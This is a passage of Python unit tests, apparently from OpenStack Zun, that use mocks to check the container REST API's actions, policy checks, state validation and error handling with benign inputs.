actual_containers[0].get('uuid'))
self.assertNotIn('host', actual_containers[0])
@patch('zun.common.context.RequestContext.can')
@patch('zun.objects.Container.list')
def test_get_all_containers_by_admin(self, mock_container_list, mock_can):
mock_can.return_value = True
test_container = utils.get_test_container()
containers = [objects.Container(self.context, **test_container)]
mock_container_list.return_value = containers
response = self.get('/v1/containers/')
mock_container_list.assert_called_once_with(mock.ANY,
1000, None, 'id', 'asc',
filters={})
context = mock_container_list.call_args[0][0]
self.assertIs(False, context.all_projects)
self.assertEqual(200, response.status_int)
actual_containers = response.json['containers']
self.assertEqual(1, len(actual_containers))
self.assertEqual(test_container['uuid'],
actual_containers[0].get('uuid'))
self.assertIn('host', actual_containers[0])
@patch('zun.common.policy.enforce')
@patch('zun.objects.Container.list')
def test_get_all_containers_all_projects(self, mock_container_list,
mock_policy):
mock_policy.return_value = True
test_container = utils.get_test_container()
containers = [objects.Container(self.context, **test_container)]
mock_container_list.return_value = containers
response = self.get('/v1/containers/?all_projects=1')
mock_container_list.assert_called_once_with(mock.ANY,
1000, None, 'id', 'asc',
filters={})
context = mock_container_list.call_args[0][0]
self.assertIs(True, context.all_projects)
self.assertEqual(200, response.status_int)
actual_containers = response.json['containers']
self.assertEqual(1, len(actual_containers))
self.assertEqual(test_container['uuid'],
actual_containers[0].get('uuid'))
@patch('zun.objects.Container.list')
def test_get_all_has_status_reason_and_image_pull_policy(
self, mock_container_list):
test_container = utils.get_test_container()
containers = [objects.Container(self.context, **test_container)]
mock_container_list.return_value = containers
response = self.get('/v1/containers/')
self.assertEqual(200, response.status_int)
actual_containers = response.json['containers']
self.assertEqual(1, len(actual_containers))
self.assertEqual(test_container['uuid'],
actual_containers[0].get('uuid'))
self.assertIn('status_reason', actual_containers[0].keys())
self.assertIn('image_pull_policy', actual_containers[0].keys())
@patch('zun.objects.Container.list')
def test_get_all_containers_with_pagination_marker(self,
mock_container_list):
container_list = []
for id_ in range(4):
test_container = utils.create_test_container(
id=id_, uuid=uuidutils.generate_uuid(),
name='container' + str(id_), context=self.context)
container_list.append(objects.Container(self.context,
**test_container))
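        # Return only the last container to simulate the page that follows
        # the marker (the third container's uuid).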
mock_container_list.return_value = container_list[-1:]
response = self.get('/v1/containers/?limit=3&marker=%s'
% container_list[2].uuid)
self.assertEqual(200, response.status_int)
actual_containers = response.json['containers']
self.assertEqual(1, len(actual_containers))
self.assertEqual(container_list[-1].uuid,
actual_containers[0].get('uuid'))
@patch('zun.objects.Container.list')
def test_get_all_containers_with_filter(self, mock_container_list):
test_container = utils.get_test_container()
containers = [objects.Container(self.context, **test_container)]
mock_container_list.return_value = containers
response = self.get('/v1/containers/?name=fake-name')
mock_container_list.assert_called_once_with(
mock.ANY, 1000, None, 'id', 'asc', filters={'name': 'fake-name'})
self.assertEqual(200, response.status_int)
actual_containers = response.json['containers']
self.assertEqual(1, len(actual_containers))
self.assertEqual(test_container['uuid'],
actual_containers[0].get('uuid'))
@patch('zun.objects.Container.list')
def test_get_all_containers_with_filter_disallow(
self, mock_container_list):
test_container = utils.get_test_container()
containers = [objects.Container(self.context, **test_container)]
mock_container_list.return_value = containers
response = self.get('/v1/containers/?host=fake-name',
expect_errors=True)
self.assertEqual(403, response.status_int)
self.assertEqual('application/json', response.content_type)
rule = 'container:get_one:host'
self.assertEqual(
"Policy doesn't allow %s to be performed." % rule,
response.json['errors'][0]['detail'])
@patch('zun.objects.Container.list')
def test_get_all_containers_with_unknown_parameter(
self, mock_container_list):
test_container = utils.get_test_container()
containers = [objects.Container(self.context, **test_container)]
mock_container_list.return_value = containers
response = self.get('/v1/containers/?unknown=fake-name',
expect_errors=True)
mock_container_list.assert_not_called()
self.assertEqual(400, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertEqual("Unknown parameters: unknown",
response.json['errors'][0]['detail'])
@patch('zun.objects.Container.list')
def test_get_all_containers_with_exception(self, mock_container_list):
test_container = utils.get_test_container()
containers = [objects.Container(self.context, **test_container)]
mock_container_list.return_value = containers
response = self.get('/v1/containers/')
mock_container_list.assert_called_once_with(mock.ANY,
1000, None, 'id', 'asc',
filters={})
self.assertEqual(200, response.status_int)
actual_containers = response.json['containers']
self.assertEqual(1, len(actual_containers))
self.assertEqual(test_container['uuid'],
actual_containers[0].get('uuid'))
@patch('zun.compute.api.API.container_show')
@patch('zun.objects.Container.get_by_uuid')
def test_get_one_by_uuid(self, mock_container_get_by_uuid,
mock_container_show):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_container_get_by_uuid.return_value = test_container_obj
mock_container_show.return_value = test_container_obj
response = self.get('/v1/containers/%s/' % test_container['uuid'])
mock_container_get_by_uuid.assert_called_once_with(
mock.ANY,
test_container['uuid'])
context = mock_container_get_by_uuid.call_args[0][0]
self.assertIs(False, context.all_projects)
self.assertEqual(200, response.status_int)
self.assertEqual(test_container['uuid'],
response.json['uuid'])
self.assertNotIn('host', response.json)
@patch('zun.common.context.RequestContext.can')
@patch('zun.compute.api.API.container_show')
@patch('zun.objects.Container.get_by_uuid')
def test_get_one_by_admin(self, mock_container_get_by_uuid,
mock_container_show, mock_can):
mock_can.return_value = True
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_container_get_by_uuid.return_value = test_container_obj
mock_container_show.return_value = test_container_obj
response = self.get('/v1/containers/%s/' % test_container['uuid'])
mock_container_get_by_uuid.assert_called_once_with(
mock.ANY,
test_container['uuid'])
context = mock_container_get_by_uuid.call_args[0][0]
self.assertIs(False, context.all_projects)
self.assertEqual(200, response.status_int)
self.assertEqual(test_container['uuid'],
response.json['uuid'])
self.assertIn('host', response.json)
@patch('zun.common.policy.enforce')
@patch('zun.compute.api.API.container_show')
@patch('zun.objects.Container.get_by_uuid')
def test_get_one_by_uuid_all_projects(self, mock_container_get_by_uuid,
mock_container_show, mock_policy):
mock_policy.return_value = True
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_container_get_by_uuid.return_value = test_container_obj
mock_container_show.return_value = test_container_obj
response = self.get('/v1/containers/%s/?all_projects=1' %
test_container['uuid'])
mock_container_get_by_uuid.assert_called_once_with(
mock.ANY,
test_container['uuid'])
context = mock_container_get_by_uuid.call_args[0][0]
self.assertIs(True, context.all_projects)
self.assertEqual(200, response.status_int)
self.assertEqual(test_container['uuid'],
response.json['uuid'])
@patch('zun.objects.ComputeNode.get_by_name')
@patch('zun.compute.api.API.container_update')
@patch('zun.objects.Container.get_by_uuid')
def test_patch_by_uuid(self, mock_container_get_by_uuid, mock_update,
mock_computenode):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_container_get_by_uuid.return_value = test_container_obj
mock_update.return_value = test_container_obj
test_host = utils.get_test_compute_node()
numa = objects.numa.NUMATopology._from_dict(test_host['numa_topology'])
test_host['numa_topology'] = numa
test_host_obj = objects.ComputeNode(self.context, **test_host)
mock_computenode.return_value = test_host_obj
params = {'cpu': 1}
container_uuid = test_container.get('uuid')
response = self.patch_json(
'/containers/%s/' % container_uuid,
params=params)
self.assertEqual(200, response.status_int)
self.assertTrue(mock_update.called)
self.assertNotIn('host', response.json)
@patch('zun.common.context.RequestContext.can')
@patch('zun.objects.ComputeNode.get_by_name')
@patch('zun.compute.api.API.container_update')
@patch('zun.objects.Container.get_by_uuid')
def test_patch_by_admin(self, mock_container_get_by_uuid, mock_update,
mock_computenode, mock_can):
mock_can.return_value = True
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_container_get_by_uuid.return_value = test_container_obj
mock_update.return_value = test_container_obj
test_host = utils.get_test_compute_node()
numa = objects.numa.NUMATopology._from_dict(test_host['numa_topology'])
test_host['numa_topology'] = numa
test_host_obj = objects.ComputeNode(self.context, **test_host)
mock_computenode.return_value = test_host_obj
params = {'cpu': 1}
container_uuid = test_container.get('uuid')
response = self.patch_json(
'/containers/%s/' % container_uuid,
params=params)
self.assertEqual(200, response.status_int)
self.assertTrue(mock_update.called)
self.assertIn('host', response.json)
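    # Shared driver for the action endpoints (start/stop/pause/...): POSTs
    # /v1/containers/<ident>/<action>/ with the identifier lookup mocked,
    # then checks both the dispatch to the compute API and that GET on the
    # same URL is rejected.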
def _action_test(self, test_container_obj, action, ident_field,
mock_container_action, status_code, query_param=''):
ident = test_container_obj.uuid
get_by_ident_loc = 'zun.objects.Container.get_by_%s' % ident_field
        with patch(get_by_ident_loc) as mock_get_by_ident:
            mock_get_by_ident.return_value = test_container_obj
response = self.post('/v1/containers/%s/%s/?%s' %
(ident, action, query_param))
self.assertEqual(status_code, response.status_int)
            # Only POST should work; other methods such as GET must fail
self.assertRaises(AppError, self.get,
('/v1/containers/%s/%s/' %
(ident, action)))
if query_param:
value = query_param.split('=')[1]
mock_container_action.assert_called_once_with(
mock.ANY, test_container_obj, value)
else:
mock_container_action.assert_called_once_with(
mock.ANY, test_container_obj)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_start')
def test_start_by_uuid(self, mock_container_start, mock_validate):
test_container_obj = objects.Container(self.context,
**utils.get_test_container())
self._action_test(test_container_obj, 'start', 'uuid',
mock_container_start, 202)
def test_start_by_uuid_invalid_state(self):
uuid = uuidutils.generate_uuid()
test_object = utils.create_test_container(context=self.context,
uuid=uuid, status='Running')
with self.assertRaisesRegex(
AppError, "Cannot start container %s in Running state" % uuid):
self.post('/v1/containers/%s/%s/' % (test_object.uuid,
'start'))
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_stop')
def test_stop_by_uuid(self, mock_container_stop, mock_validate):
test_container_obj = objects.Container(self.context,
**utils.get_test_container())
self._action_test(test_container_obj, 'stop', 'uuid',
mock_container_stop, 202,
query_param='timeout=10')
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_stop')
def test_stop_by_name_invalid_timeout_value(self,
mock_container_stop,
mock_validate):
test_container_obj = objects.Container(self.context,
**utils.get_test_container())
with self.assertRaisesRegex(AppError,
"Invalid input for query parameters"):
self._action_test(test_container_obj, 'stop', 'name',
mock_container_stop, 202,
query_param='timeout=xyz')
def test_stop_by_uuid_invalid_state(self):
uuid = uuidutils.generate_uuid()
test_object = utils.create_test_container(context=self.context,
uuid=uuid, status='Stopped')
with self.assertRaisesRegex(
AppError, "Cannot stop container %s in Stopped state" % uuid):
self.post('/v1/containers/%s/%s/' % (test_object.uuid,
'stop'))
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_pause')
def test_pause_by_uuid(self, mock_container_pause, mock_validate):
test_container_obj = objects.Container(self.context,
**utils.get_test_container())
self._action_test(test_container_obj, 'pause', 'uuid',
mock_container_pause, 202)
def test_pause_by_uuid_invalid_state(self):
uuid = uuidutils.generate_uuid()
test_object = utils.create_test_container(context=self.context,
uuid=uuid, status='Stopped')
with self.assertRaisesRegex(
AppError, "Cannot pause container %s in Stopped state" % uuid):
self.post('/v1/containers/%s/%s/' % (test_object.uuid,
'pause'))
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_unpause')
def test_unpause_by_uuid(self, mock_container_unpause, mock_validate):
test_container_obj = objects.Container(self.context,
**utils.get_test_container())
self._action_test(test_container_obj, 'unpause', 'uuid',
mock_container_unpause, 202)
def test_unpause_by_uuid_invalid_state(self):
uuid = uuidutils.generate_uuid()
test_object = utils.create_test_container(context=self.context,
uuid=uuid, status='Running')
with self.assertRaisesRegex(
AppError,
"Cannot unpause container %s in Running state" % uuid):
self.post('/v1/containers/%s/%s/' % (test_object.uuid,
'unpause'))
@patch('zun.compute.api.API.container_rebuild')
@patch('zun.common.policy.enforce')
def test_rebuild_container(self, mock_policy, mock_rebuild):
mock_policy.return_value = True
uuid = uuidutils.generate_uuid()
utils.create_test_container(context=self.context,
uuid=uuid, name="container")
url = '/v1/containers/%s/rebuild' % uuid
response = self.post(url)
self.assertEqual(202, response.status_int)
mock_rebuild.assert_called_once()
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_reboot')
def test_reboot_by_uuid(self, mock_container_reboot, mock_validate):
test_container_obj = objects.Container(self.context,
**utils.get_test_container())
with patch.object(test_container_obj, 'save') as mock_save:
self._action_test(test_container_obj, 'reboot', 'uuid',
mock_container_reboot, 202,
query_param='timeout=10')
mock_save.assert_called_once()
def test_reboot_by_uuid_invalid_state(self):
uuid = uuidutils.generate_uuid()
test_object = utils.create_test_container(context=self.context,
uuid=uuid, status='Paused')
with self.assertRaisesRegex(
AppError, "Cannot reboot container %s in Paused state" % uuid):
self.post('/v1/containers/%s/%s/' % (test_object.uuid,
'reboot'))
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_reboot')
def test_reboot_by_name_wrong_timeout_value(self, mock_container_reboot,
mock_validate):
test_container_obj = objects.Container(self.context,
**utils.get_test_container())
with self.assertRaisesRegex(AppError,
"Invalid input for query parameters"):
self._action_test(test_container_obj, 'reboot', 'name',
mock_container_reboot, 202,
query_param='timeout=xyz')
@patch('zun.compute.api.API.container_logs')
@patch('zun.objects.Container.get_by_uuid')
def test_get_logs_by_uuid(self, mock_get_by_uuid, mock_container_logs):
mock_container_logs.return_value = "test"
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
response = self.get('/v1/containers/%s/logs/' % container_uuid)
self.assertEqual(200, response.status_int)
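        # Judging by the options test below, the positional args after the
        # container appear to be (stdout, stderr, timestamps, tail, since),
        # asserted here with their defaults.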
mock_container_logs.assert_called_once_with(
mock.ANY, test_container_obj, True, True, False, 'all', None)
@patch('zun.compute.api.API.container_logs')
@patch('zun.objects.Container.get_by_uuid')
def test_get_logs_with_options_by_uuid(self, mock_get_by_uuid,
mock_container_logs):
mock_container_logs.return_value = "test"
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
response = self.get(
'/v1/containers/%s/logs?stderr=True&stdout=True'
            '&timestamps=False&tail=1&since=100000000' % container_uuid)
self.assertEqual(200, response.status_int)
mock_container_logs.assert_called_once_with(
mock.ANY, test_container_obj, True, True, False, '1', '100000000')
@patch('zun.compute.api.API.container_logs')
@patch('zun.objects.Container.get_by_uuid')
def test_get_logs_put_fails(self, mock_get_by_uuid, mock_container_logs):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
self.assertRaises(AppError, self.post,
'/v1/containers/%s/logs/' % container_uuid)
self.assertFalse(mock_container_logs.called)
@patch('zun.compute.api.API.container_logs')
@patch('zun.objects.Container.get_by_uuid')
def test_get_logs_with_invalid_since(self, mock_get_by_uuid,
mock_container_logs):
invalid_sinces = ['x11', '11x', '2000-01-01 01:01:01']
for value in invalid_sinces:
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context,
**test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
params = {'since': value}
self.assertRaises(AppError, self.post,
'/v1/containers/%s/logs' %
container_uuid, params)
self.assertFalse(mock_container_logs.called)
def test_get_logs_with_invalid_state(self):
uuid = uuidutils.generate_uuid()
test_object = utils.create_test_container(context=self.context,
uuid=uuid, status='Creating')
with self.assertRaisesRegex(
AppError,
"Cannot logs container %s in Creating state" % uuid):
self.get('/v1/containers/%s/logs/' % test_object.uuid)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_exec')
@patch('zun.objects.Container.get_by_uuid')
def test_execute_command_by_uuid(self, mock_get_by_uuid,
mock_container_exec, mock_validate):
mock_container_exec.return_value = ""
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
url = '/v1/containers/%s/%s/' % (container_uuid, 'execute')
cmd = {'command': 'ls'}
response = self.post(url, cmd)
self.assertEqual(200, response.status_int)
mock_container_exec.assert_called_once_with(
mock.ANY, test_container_obj, cmd['command'], True, False)
def test_exec_command_by_uuid_invalid_state(self):
uuid = uuidutils.generate_uuid()
test_object = utils.create_test_container(context=self.context,
uuid=uuid, status='Stopped')
cmd = {'command': 'ls'}
with self.assertRaisesRegex(
AppError,
"Cannot execute container %s in Stopped state" % uuid):
self.post('/v1/containers/%s/%s/' % (test_object.uuid,
'execute'), cmd)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_exec')
@patch('zun.objects.Container.get_by_uuid')
def test_execute_without_command_by_uuid(self, mock_get_by_uuid,
mock_container_exec,
mock_validate):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
cmd = {'command': ''}
self.assertRaises(AppError, self.post,
'/v1/containers/%s/execute' %
container_uuid, cmd)
self.assertFalse(mock_container_exec.called)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_delete')
@patch('zun.objects.Container.get_by_uuid')
def test_delete_container_by_uuid(self, mock_get_by_uuid,
mock_container_delete, mock_validate):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
response = self.delete('/v1/containers/%s/' % container_uuid)
self.assertEqual(204, response.status_int)
mock_container_delete.assert_called_once_with(
mock.ANY, test_container_obj, False)
context = mock_container_delete.call_args[0][0]
self.assertIs(False, context.all_projects)
@patch('zun.common.policy.enforce')
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_delete')
@patch('zun.objects.Container.get_by_uuid')
def test_delete_container_by_uuid_all_projects(self, mock_get_by_uuid,
mock_container_delete,
mock_validate, mock_policy):
mock_policy.return_value = True
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
response = self.delete('/v1/containers/%s/?all_projects=1' %
container_uuid)
self.assertEqual(204, response.status_int)
mock_container_delete.assert_called_once_with(
mock.ANY, test_container_obj, False)
context = mock_container_delete.call_args[0][0]
self.assertIs(True, context.all_projects)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_stop')
@patch('zun.compute.api.API.container_delete')
@patch('zun.objects.Container.get_by_uuid')
def test_delete_container_by_uuid_with_stop(self, mock_get_by_uuid,
mock_container_stop,
mock_container_delete,
mock_validate):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
response = self.delete('/v1/containers/%s?stop=True' %
container_uuid)
self.assertEqual(204, response.status_int)
def test_delete_by_uuid_invalid_state(self):
uuid = uuidutils.generate_uuid()
test_object = utils.create_test_container(context=self.context,
uuid=uuid, status='Running')
with self.assertRaisesRegex(
AppError,
"Cannot delete container %s in Running state" % uuid):
self.delete('/v1/containers/%s' % (test_object.uuid))
@patch('zun.common.policy.enforce')
def test_delete_force_by_uuid_invalid_state(self, mock_policy):
mock_policy.return_value = True
uuid = uuidutils.generate_uuid()
test_object = utils.create_test_container(context=self.context,
uuid=uuid, status='Paused')
with self.assertRaisesRegex(
AppError,
"Cannot delete_force container %s in Paused state" % uuid):
self.delete('/v1/containers/%s?force=True' % test_object.uuid)
@patch('zun.common.policy.enforce')
@patch('zun.compute.api.API.container_delete')
def test_delete_by_uuid_invalid_state_force_true(self, mock_delete,
mock_policy):
mock_policy.return_value = True
uuid = uuidutils.generate_uuid()
test_object = utils.create_test_container(context=self.context,
uuid=uuid, status='Running')
response = self.delete('/v1/containers/%s?force=True' % (
test_object.uuid))
self.assertEqual(204, response.status_int)
@patch('zun.compute.api.API.container_delete')
def test_delete_by_uuid_with_force_wrong(self, mock_delete):
uuid = uuidutils.generate_uuid()
test_object = utils.create_test_container(context=self.context,
uuid=uuid)
mock_delete.side_effect = exception.InvalidValue
self.assertRaises(AppError, self.delete,
'/v1/containers/%s?force=wrong' % test_object.uuid)
        mock_delete.assert_not_called()
def test_delete_container_with_uuid_not_found(self):
uuid = uuidutils.generate_uuid()
self.assertRaises(AppError, self.delete,
'/v1/containers/%s' % uuid)
@patch('zun.objects.Container.destroy')
@patch('zun.common.utils.validate_container_state')
@patch('zun.objects.Container.get_by_uuid')
def test_delete_container_without_host(self, mock_get_by_uuid,
mock_validate, mock_destroy):
test_container = utils.get_test_container(host="")
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
response = self.delete('/v1/containers/%s/' % container_uuid)
self.assertEqual(204, response.status_int)
mock_validate.assert_called_once()
mock_destroy.assert_called_once()
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_kill')
@patch('zun.objects.Container.get_by_uuid')
def test_kill_container_by_uuid(self,
mock_get_by_uuid, mock_container_kill,
mock_validate):
test_container_obj = objects.Container(self.context,
**utils.get_test_container())
mock_container_kill.return_value = test_container_obj
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
url = '/v1/containers/%s/%s/' % (container_uuid, 'kill')
cmd = {'signal': '9'}
response = self.post(url, cmd)
self.assertEqual(202, response.status_int)
mock_container_kill.assert_called_once_with(
mock.ANY, test_container_obj, cmd['signal'])
def test_kill_by_uuid_invalid_state(self):
uuid = uuidutils.generate_uuid()
test_object = utils.create_test_container(context=self.context,
uuid=uuid, status='Stopped')
body = {'signal': 9}
with self.assertRaisesRegex(
AppError, "Cannot kill container %s in Stopped state" % uuid):
self.post('/v1/containers/%s/%s/' % (test_object.uuid,
'kill'), body)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_kill')
@patch('zun.objects.Container.get_by_uuid')
def test_kill_container_which_not_exist(self,
mock_get_by_uuid,
mock_container_kill,
mock_validate):
mock_container_kill.return_value = ""
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
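        # get_by_uuid is mocked, so the missing container is simulated by
        # having the compute kill call raise; webtest wraps that in AppError.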
mock_container_kill.side_effect = Exception
container_uuid = "edfe2a25-2901-438d-8157-fffffd68d051"
self.assertRaises(AppError, self.post,
'/v1/containers/%s/%s/' % (container_uuid, 'kill'))
self.assertTrue(mock_container_kill.called)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_kill')
@patch('zun.objects.Container.get_by_uuid')
def test_kill_container_with_exception(self,
mock_get_by_uuid,
mock_container_kill,
mock_validate):
mock_container_kill.return_value = ""
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
mock_container_kill.side_effect = Exception
container_uuid = test_container.get('uuid')
self.assertRaises(AppError, self.post,
'/v1/containers/%s/%s/' % (container_uuid, 'kill'))
self.assertTrue(mock_container_kill.called)
@patch('zun.compute.api.API.container_kill')
@patch('zun.objects.Container.get_by_uuid')
    def test_kill_container_with_invalid_signal(self,
mock_get_by_uuid,
mock_container_kill):
invalid_signal = ['11x', 'x11']
for value in invalid_signal:
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context,
**test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
params = {'signal': value}
with self.assertRaisesRegex(
AppError, "Bad response: 400 Bad Request"):
self.post('/v1/containers/%s/kill/' %
container_uuid, params)
self.assertFalse(mock_container_kill.called)
@patch('zun.network.neutron.NeutronAPI.get_available_network')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_create_container_resp_has_image_driver(self, mock_search,
mock_container_create,
mock_neutron_get_network):
mock_container_create.side_effect = lambda x, y, **z: y
# Create a container with a command
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"},'
'"image_driver": "glance"}')
response = self.post('/v1/containers/',
params=params,
content_type='application/json')
self.assertEqual(202, response.status_int)
self.assertIn('image_driver', response.json.keys())
self.assertEqual('glance', response.json.get('image_driver'))
@patch('zun.compute.api.API.container_attach')
@patch('zun.objects.Container.get_by_uuid')
def test_attach_container_by_uuid(self, mock_get_by_uuid,
mock_container_attach):
mock_container_attach.return_value = "ws://test"
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context,
**test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
response = self.get('/v1/containers/%s/attach/' % container_uuid)
self.assertEqual(200, response.status_int)
mock_container_attach.assert_called_once_with(
mock.ANY, test_container_obj)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_attach')
@patch('zun.objects.Container.get_by_uuid')
def test_attach_container_with_exception(self,
mock_get_by_uuid,
mock_container_attach,
mock_validate):
mock_container_attach.return_value = ""
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
mock_container_attach.side_effect = Exception
container_uuid = test_container.get('uuid')
self.assertRaises(AppError, self.get,
'/v1/containers/%s/attach/' % container_uuid)
self.assertTrue(mock_container_attach.called)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_resize')
@patch('zun.objects.Container.get_by_name')
def test_resize_by_uuid(self, mock_get_by_uuid, mock_container_resize,
mock_validate):
test_container_obj = objects.Container(self.context,
**utils.get_test_container())
mock_container_resize.return_value = test_container_obj
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_name = test_container.get('name')
url = '/v1/containers/%s/%s/' % (container_name, 'resize')
cmd = {'h': '100', 'w': '100'}
response = self.post(url, cmd)
self.assertEqual(200, response.status_int)
mock_container_resize.assert_called_once_with(
mock.ANY, test_container_obj, cmd['h'], cmd['w'])
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_resize')
@patch('zun.objects.Container.get_by_uuid')
def test_resize_with_exception(self, mock_get_by_uuid,
mock_container_resize, mock_validate):
mock_container_resize.return_value = ""
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
mock_container_resize.side_effect = Exception
container_uuid = test_container.get('uuid')
body = {'h': '100', 'w': '100'}
self.assertRaises(AppError, self.post,
'/v1/containers/%s/%s/' %
(container_uuid, 'resize'), body)
self.assertTrue(mock_container_resize.called)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.resize_container')
@patch('zun.objects.Container.get_by_name')
def test_resize_container(self, mock_get_by_uuid,
mock_resize_container, mock_validate):
test_container_obj = objects.Container(self.context,
**utils.get_test_container())
mock_resize_container.return_value = test_container_obj
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_name = test_container.get('name')
url = '/v1/containers/%s/resize_container/' % container_name
params = {'cpu': 1, 'memory': '512'}
response = self.post(url, params)
self.assertEqual(202, response.status_int)
mock_resize_container.assert_called_once_with(
mock.ANY, test_container_obj, params)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_top')
@patch('zun.objects.Container.get_by_uuid')
def test_top_command_by_uuid(self, mock_get_by_uuid,
mock_container_top, mock_validate):
mock_container_top.return_value = ""
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
response = self.get('/v1/containers/%s/top?ps_args=aux' %
container_uuid)
self.assertEqual(200, response.status_int)
self.assertTrue(mock_container_top.called)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_top')
@patch('zun.objects.Container.get_by_uuid')
def test_top_command_invalid_ps(self, mock_get_by_uuid,
mock_container_top, mock_validate):
mock_container_top.return_value = ""
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
mock_container_top.side_effect = Exception
container_uuid = test_container.get('uuid')
self.assertRaises(AppError, self.get,
'/v1/containers/%s/top?ps_args=kkkk' %
container_uuid)
self.assertTrue(mock_container_top.called)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_get_archive')
@patch('zun.objects.Container.get_by_uuid')
def test_get_archive_by_uuid(self,
mock_get_by_uuid,
container_get_archive,
mock_validate):
container_get_archive.return_value = ("", "")
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
url = '/v1/containers/%s/%s/' % (container_uuid, 'get_archive')
cmd = {'path': '/home/1.txt'}
response = self.get(url, cmd)
self.assertEqual(200, response.status_int)
container_get_archive.assert_called_once_with(
mock.ANY, test_container_obj, cmd['path'])
def test_get_archive_by_uuid_invalid_state(self):
uuid = uuidutils.generate_uuid()
test_object = utils.create_test_container(context=self.context,
uuid=uuid, status='Error')
with self.assertRaisesRegex(
AppError,
"Cannot get_archive container %s in Error state" % uuid):
self.get('/v1/containers/%s/%s/' % (test_object.uuid,
'get_archive'))
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_put_archive')
@patch('zun.objects.Container.get_by_uuid')
def test_put_archive_by_uuid(self,
mock_get_by_uuid,
container_put_archive,
mock_validate):
container_put_archive.return_value = ""
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
url = '/v1/containers/%s/%s/' % (container_uuid, 'put_archive')
cmd = {'path': '/home/',
'data': '/home/1.tar'}
response = self.post(url, cmd)
self.assertEqual(200, response.status_int)
